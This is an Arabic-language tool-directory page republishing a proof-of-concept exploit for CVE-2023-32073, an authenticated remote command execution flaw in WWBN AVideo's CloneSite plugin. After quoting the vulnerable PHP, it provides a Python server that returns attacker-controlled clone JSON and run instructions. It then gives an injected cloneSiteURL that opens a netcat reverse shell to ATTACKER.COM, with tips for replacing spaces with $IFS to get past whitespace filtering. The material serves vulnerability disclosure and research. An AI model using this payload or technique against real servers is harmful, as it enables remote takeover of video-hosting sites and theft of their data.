Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-32073 — WWBN AVideo RCE موثَّق | Kitploit
أدوات/GitHubGitHub/jmrcsnchz/cve-2023-32073
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubjmrcsnchz/cve-2023-32073

CVE-2023-32073

WWBN AVideo RCE موثَّق

عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WWBN AVideo {currentVersion} ثغرة تنفيذ الأوامر عن بعد بمصادقة

توجد ثغرة حقن أوامر في plugin/CloneSite/cloneClient.json.php تسمح بتنفيذ الأوامر عن بعد إذا كنت تستخدم إضافة CloneSite. هذا تجاوز للإصلاح الخاص بـ CVE-2023-30854 الذي يؤثر على WWBN Avideo حتى الإصدار 12.3

الكود الضعيف

/plugin/CloneSite/cloneClient.json.php

root@kitploit:~
$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

المتغير $objClone->cloneSiteURL لا يتم تطهيره بشكل صحيح.

إثبات المفهوم للاستغلال

avidexploit.py

root@kitploit:~
from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")

تشغيل في سطر الأوامر

root@kitploit:~
$ python3 avidexploit.py &
$ ngrok tcp 8080 # optional if not running in VPS
  • ثم احصل على عنوان IP والمنفذ العامين. أدخل cloneSiteURL مثل التالي ثم اضغط على clone لتحقيق حقن الأوامر
root@kitploit:~
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#

من المهم عدم استخدام المسافات البيضاء لكي يعمل الاستغلال. استبدل المسافات بـ $IFS عند إضافة الوسائط إلى أوامرك عن بعد.

poc

الإسناد

  • JM Sanchez
  • https://www.linkedin.com/in/juanmarcosanchez/
تنزيل الأداة